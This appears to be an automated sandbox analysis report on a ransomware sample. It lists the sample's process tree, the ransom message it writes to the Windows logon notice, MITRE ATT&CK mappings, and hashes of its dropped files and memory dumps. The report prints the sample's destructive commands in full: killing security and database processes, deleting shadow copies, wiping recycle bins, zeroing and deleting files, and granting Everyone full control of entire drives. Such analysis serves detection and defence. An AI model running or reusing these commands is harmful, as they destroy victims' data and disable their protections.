PID 1808 wrote to memory of 3328	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	113
PID 1808 wrote to memory of 2136	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	115
PID 1808 wrote to memory of 2136	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	115
PID 1808 wrote to memory of 2136	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	115
PID 1808 wrote to memory of 3388	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	117
PID 1808 wrote to memory of 3388	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	117
PID 1808 wrote to memory of 3388	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	117
PID 1808 wrote to memory of 428	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	119
PID 1808 wrote to memory of 428	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	119
PID 1808 wrote to memory of 428	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	119
PID 1808 wrote to memory of 2120	1808	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	121

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED"	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO"	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe

C:\Users\Admin\AppData\Local\Temp\9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe"
1⤵
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1808
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3984
- C:\Windows\SysWOW64\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:8
- C:\Windows\SysWOW64\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:1096
- C:\Windows\SysWOW64\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:2132
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:3488
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:584
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:3284
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:2780
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:2760
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:3968
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:3772
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:3856
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c rd /s /q D:\\$Recycle.bin
  2⤵
  PID:364
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:2104
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1012
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3864
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3960
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:3328
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2136
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3388
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:428
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2120
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3952
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3116
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1324
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:384
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3848
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:752
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3868
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3400
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4104
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4140
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  PID:4212
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  PID:4224
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4332
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  2⤵
  PID:4320
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4412
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4480
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4512
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4584
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4636
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4688
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:4740
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4780
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4792
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4856
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4988
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5052
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5064
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
  2⤵
  PID:5076
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3948
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:4148
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:4348
- - C:\Windows\SysWOW64\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:5040
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1296
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4188
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4276
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4268
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3984
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4212
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3856
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3968
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4224
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4456
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4504
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4516
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4612
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4824
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4728
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4640
- C:\Windows\SysWOW64\icacls.exe
  "icacls" "Z:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4996
- C:\Windows\SysWOW64\icacls.exe
  "icacls" "D:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4968
- C:\Windows\SysWOW64\icacls.exe
  "icacls" "C:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4656
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
  2⤵
  PID:3824
- - C:\Windows\SysWOW64\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:1580

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Filesize
2KB

MD5
bbf67560d18bd3657aa8cd7ee0286c34

SHA1
5b067355e1f5ebdf551886c2f9aa916205c915b7

SHA256
dc2d9326c65de82075eeae75eab56c5f53fcbf445586d81888279f189b6180b5

SHA512
51839ce413e41d8b0b405b25f26e7d2355184184e0c3bc110410b43c03d968dddfe6a91fae618345417078751f3434d3acccfa2fdb26562e4543e0df732fe94d

Download Submit
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Filesize
21KB

MD5
de31bf120448e7467766942d8d7e55eb

SHA1
ce49f68a55beafb1638055bd377c89acf641f3d9

SHA256
8b817d354dc584abee9bb4a822a65ceb6680ad730ef021b74a7b5dcd7840bda6

SHA512
a088c8786af5669db7b5e34e20d3b883b04b17f88d64ea816e345a8ecc618beceb9fb1ba9b3dd44a4f6291903d5bd1cf90a3614585c5b49ef1909460ff4f7053

Download Submit
memory/8-120-0x0000000000000000-mapping.dmp

Download
memory/364-132-0x0000000000000000-mapping.dmp

Download
memory/384-144-0x0000000000000000-mapping.dmp

Download
memory/428-139-0x0000000000000000-mapping.dmp

Download
memory/584-124-0x0000000000000000-mapping.dmp

Download
memory/752-146-0x0000000000000000-mapping.dmp

Download
memory/1012-133-0x0000000000000000-mapping.dmp

Download
memory/1096-121-0x0000000000000000-mapping.dmp

Download
memory/1296-173-0x0000000000000000-mapping.dmp

Download
memory/1324-143-0x0000000000000000-mapping.dmp

Download
memory/1808-169-0x0000000006B60000-0x0000000006B61000-memory.dmp

Filesize
4KB

Download
memory/1808-114-0x0000000000920000-0x0000000000921000-memory.dmp

Filesize
4KB

Download
memory/1808-118-0x0000000005A90000-0x0000000005A91000-memory.dmp

Filesize
4KB

Download
memory/1808-117-0x0000000002A90000-0x0000000002A91000-memory.dmp

Filesize
4KB

Download
memory/1808-116-0x0000000005170000-0x0000000005171000-memory.dmp

Filesize
4KB

Download
memory/2104-131-0x0000000000000000-mapping.dmp

Download
memory/2120-140-0x0000000000000000-mapping.dmp

Download
memory/2132-122-0x0000000000000000-mapping.dmp

Download
memory/2136-137-0x0000000000000000-mapping.dmp

Download
memory/2760-127-0x0000000000000000-mapping.dmp

Download
memory/2780-126-0x0000000000000000-mapping.dmp

Download
memory/3116-142-0x0000000000000000-mapping.dmp

Download
memory/3284-125-0x0000000000000000-mapping.dmp

Download
memory/3328-136-0x0000000000000000-mapping.dmp

Download
memory/3388-138-0x0000000000000000-mapping.dmp

Download
memory/3400-148-0x0000000000000000-mapping.dmp

Download
memory/3488-123-0x0000000000000000-mapping.dmp

Download
memory/3772-129-0x0000000000000000-mapping.dmp

Download
memory/3848-145-0x0000000000000000-mapping.dmp

Download
memory/3856-179-0x0000000000000000-mapping.dmp

Download
memory/3856-130-0x0000000000000000-mapping.dmp

Download
memory/3864-134-0x0000000000000000-mapping.dmp

Download
memory/3868-147-0x0000000000000000-mapping.dmp

Download
memory/3948-170-0x0000000000000000-mapping.dmp

Download
memory/3952-141-0x0000000000000000-mapping.dmp

Download
memory/3960-135-0x0000000000000000-mapping.dmp

Download
memory/3968-128-0x0000000000000000-mapping.dmp

Download
memory/3968-180-0x0000000000000000-mapping.dmp

Download
memory/3984-178-0x0000000000000000-mapping.dmp

Download
memory/3984-119-0x0000000000000000-mapping.dmp

Download
memory/4104-149-0x0000000000000000-mapping.dmp

Download
memory/4140-150-0x0000000000000000-mapping.dmp

Download
memory/4148-171-0x0000000000000000-mapping.dmp

Download
memory/4188-175-0x0000000000000000-mapping.dmp

Download
memory/4212-151-0x0000000000000000-mapping.dmp

Download
memory/4224-152-0x0000000000000000-mapping.dmp

Download
memory/4268-177-0x0000000000000000-mapping.dmp

Download
memory/4276-176-0x0000000000000000-mapping.dmp

Download
memory/4320-153-0x0000000000000000-mapping.dmp

Download
memory/4332-154-0x0000000000000000-mapping.dmp

Download
memory/4348-174-0x0000000000000000-mapping.dmp

Download
memory/4412-155-0x0000000000000000-mapping.dmp

Download
memory/4456-181-0x0000000000000000-mapping.dmp

Download
memory/4480-156-0x0000000000000000-mapping.dmp

Download
memory/4504-182-0x0000000000000000-mapping.dmp

Download
memory/4512-157-0x0000000000000000-mapping.dmp

Download
memory/4516-183-0x0000000000000000-mapping.dmp

Download
memory/4584-158-0x0000000000000000-mapping.dmp

Download
memory/4612-184-0x0000000000000000-mapping.dmp

Download
memory/4636-159-0x0000000000000000-mapping.dmp

Download
memory/4640-189-0x0000000007520000-0x0000000007521000-memory.dmp

Filesize
4KB

Download
memory/4640-191-0x0000000004B72000-0x0000000004B73000-memory.dmp

Filesize
4KB

Download
memory/4640-193-0x0000000007E40000-0x0000000007E41000-memory.dmp

Filesize
4KB

Download
memory/4640-192-0x0000000007BC0000-0x0000000007BC1000-memory.dmp

Filesize
4KB

Download
memory/4640-196-0x0000000007DF0000-0x0000000007DF1000-memory.dmp

Filesize
4KB

Download
memory/4640-190-0x0000000004B70000-0x0000000004B71000-memory.dmp

Filesize
4KB

Download
memory/4640-210-0x0000000004B73000-0x0000000004B74000-memory.dmp

Filesize
4KB

Download
memory/4640-198-0x00000000086C0000-0x00000000086C1000-memory.dmp

Filesize
4KB

Download
memory/4640-187-0x0000000004B30000-0x0000000004B31000-memory.dmp

Filesize
4KB

Download
memory/4640-197-0x0000000008670000-0x0000000008671000-memory.dmp

Filesize
4KB

Download
memory/4640-195-0x0000000007F20000-0x0000000007F21000-memory.dmp

Filesize
4KB

Download
memory/4688-160-0x0000000000000000-mapping.dmp

Download
memory/4740-161-0x0000000000000000-mapping.dmp

Download
memory/4780-162-0x0000000000000000-mapping.dmp

Download
memory/4792-163-0x0000000000000000-mapping.dmp

Download
memory/4856-164-0x0000000000000000-mapping.dmp

Download
memory/4988-165-0x0000000000000000-mapping.dmp

Download
memory/5052-166-0x0000000000000000-mapping.dmp

Download
memory/5064-167-0x0000000000000000-mapping.dmp

Download
memory/5076-168-0x0000000000000000-mapping.dmp

Download